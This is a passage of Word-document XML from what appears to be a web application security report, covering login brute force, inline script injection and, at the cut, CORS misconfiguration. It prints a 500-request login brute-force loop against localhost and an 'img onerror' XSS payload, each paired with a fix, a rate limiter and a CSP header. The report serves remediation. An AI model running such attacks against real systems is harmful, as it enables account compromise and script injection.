          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/server/routes/auth.js</w:t>
      </w:r>
      <w:r w:rsidR="00BE7BE3" w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/server/routes/tickets.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9C27EB" w14:textId="77777777" w:rsidR="00BE7BE3" w:rsidRPr="00BE7BE3" w:rsidRDefault="00BE7BE3" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="325568DA" w14:textId="77777777" w:rsidR="004E318F" w:rsidRDefault="00EE11A0" w:rsidP="00EE11A0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc214584809"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Brute Force Attack on Login</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="185BD19F" w14:textId="67C713E6" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attack Script</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">for (let </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">=0; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;500; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>++) {</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>fetch(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>"http://localhost:5000/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>/auth/login", ...)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A90A02" w14:textId="571D7102" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Allows brute-force guessing</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Server overload</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Account compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F1CBB6" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C20EEEA" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>authLimiter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>rateLimit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167A7322" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>windowMs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>: 15*60*1000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729F9705" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t xml:space="preserve">  max: 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F719971" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2621E0E2" w14:textId="05D99854" w:rsidR="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r w:rsidR="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/server/server.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B101D6" w14:textId="77777777" w:rsidR="00BE7BE3" w:rsidRPr="00BE7BE3" w:rsidRDefault="00BE7BE3" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14E50127" w14:textId="77777777" w:rsidR="004E318F" w:rsidRDefault="00EE11A0" w:rsidP="00EE11A0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc214584810"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>CSP Bypass, Inline Script Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="38766123" w14:textId="019A63E2" w:rsidR="002B2C87" w:rsidRPr="002B2C87" w:rsidRDefault="002B2C87" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempted Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>="alert('XSS')"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30794E83" w14:textId="77777777" w:rsidR="002B2C87" w:rsidRPr="002B2C87" w:rsidRDefault="002B2C87" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fix: CSP Header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C5C66A" w14:textId="77777777" w:rsidR="002B2C87" w:rsidRPr="002B2C87" w:rsidRDefault="002B2C87" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>helmet.contentSecurityPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1659ADA6" w14:textId="77777777" w:rsidR="002B2C87" w:rsidRPr="002B2C87" w:rsidRDefault="002B2C87" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  directives: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>objectSrc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: ["'none'"], </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>scriptSrc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: ["'self'"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>] }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="188065D9" w14:textId="2FFFEF4E" w:rsidR="003A327C" w:rsidRDefault="002B2C87" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B2C87">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CD9D20" w14:textId="77777777" w:rsidR="00BE7BE3" w:rsidRPr="00BE7BE3" w:rsidRDefault="00BE7BE3" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D7A33EF" w14:textId="77777777" w:rsidR="004E318F" w:rsidRDefault="00EE11A0" w:rsidP="00EE11A0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc214584811"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Unsafe CORS Misconfigurations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
